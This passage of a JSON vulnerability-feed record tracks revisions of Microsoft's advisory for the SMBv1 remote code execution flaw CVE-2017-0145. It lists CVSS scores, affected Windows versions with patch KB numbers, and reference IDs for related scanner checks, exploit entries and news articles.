"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4014077", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", "KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4014077", "KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", 